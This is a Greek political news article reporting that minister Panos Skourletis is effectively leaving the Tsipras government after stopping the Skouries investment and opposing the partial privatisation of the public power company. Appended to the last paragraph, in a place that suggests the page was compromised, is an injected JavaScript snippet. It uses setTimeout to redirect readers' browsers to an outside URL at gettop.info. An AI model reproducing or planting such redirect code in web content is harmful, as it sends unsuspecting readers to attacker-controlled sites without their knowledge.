Ο Σκουρλέτης κούνησε μαντήλι στον Τσίπρα

0
12

 

Με δύο συμβολικές κινήσεις ο υπουργός Περιβάλλοντος και Ενέργειας Πάνος Σκουρλέτης, ουσιαστικά, αποχαιρέτισε την κυβέρνηση και επιστρέφει στα βουλευτικά του καθήκοντα.

Πρώτον, σταμάτησε την επένδυση στις Σκουριές Χαλκιδικής,απορρίπτοντας την αίτηση θεραπείας, την οποία είχε υποβάλει η επιχείρηση.

Και δεύτερον επισκέφθηκε την κεντρική μονάδα της ΔΕΗ στο Αμύνταιο Κοζάνης, από όπου φρόντισε να διαμηνύσει στην κυβέρνηση την αντίθεση του με την ιδιωτικοποίηση του 17% της επιχείρησης. Πρόσθεσε δε ότι αυτή ήταν η προεκλογική θέση του ΣΥΡΙΖΑ.

Είναι προφανές ότι ο κ.Σκουρλέτης κράτησε μέχρι τέλους τις «κόκκινες» γραμμές του, με στόχο να προφυλάξει το πολιτικό του κεφάλαιο. Η πρόσφατη συνάντηση με τον πρωθυπουργόσ το Μέγαρο Μαξίμου μπορεί να εκτόνωσε τη μεταξύ τους δημόσια ένταση, αλλά δεν μετέβαλε τις απόψεις του υπουργού. Έτσι, αναμένεται να βρεθεί εκτός κυβερνήσεως στον επικείμενο ανασχηματισμό.

Υπενθυμίζεται ότι ο πρωθυπουργός απέκλεισε τον άλλοτε στενότατο συνεργάτη του από το κορυφαίο κομματικό όργανο του Σύριζα, το Πολιτικό Συβούλιο που συνεδριάζει αυτή την ώρα εκτάκτως, στο Μαξίμου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here